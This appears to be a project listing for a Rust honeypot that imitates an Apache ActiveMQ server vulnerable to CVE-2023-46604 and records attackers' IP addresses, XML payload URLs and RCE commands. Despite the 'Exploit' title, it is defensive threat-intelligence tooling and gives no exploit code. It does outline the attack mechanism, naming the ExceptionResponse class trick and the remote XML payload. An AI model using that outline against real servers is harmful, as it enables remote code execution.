Exploit for Deserialization of Untrusted Data in Apache Activemq

honeypot.rs Honeypot that scopes CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise. This honeypot can be used in any Threat Intelligence infrastructure to get attacker's IP adresses, Post-Exploitation samples and malware samples. This information can be helpful to detect and prevent attacks in future. How it works? In real case attacker sends specific packet to Apache ActiveMQ service. This packet contains ExceptionResponse with Class org.springframework.context.support.ClassPathXmlApplicationContext and Message which contains XML payload url. | | |:–:| | Attack Example | Secondly, vulnerable service downloads XML payload which commonly contains RCE command. | | |:–:| | XML Payload Example | This honeypot simulates vulnerable Apache ActiveMQ service and extracts attacker's ip addresses, XML payload url and RCE command from XML payload. Then this information can be parsed from JSON. Honeypot logs can be checked by path logfile that you specified in Service.toml. | | |:–:| | Honeypot Logs | Honeypot also creates JSON output with parsable indicators. You can specify path of outfile in Service.toml. | | |:–:| | JSON Output | Installation Honeypot can be deployed on your own server (for example VPS or VDS) in docker variant. Configuration Service configuration file Service.toml can be changed by your own: service_ip = "0.0.0.0" # listen ip address service_port = 61616 # port (default for Apache ActiveMQ 61616) logfile =…Read More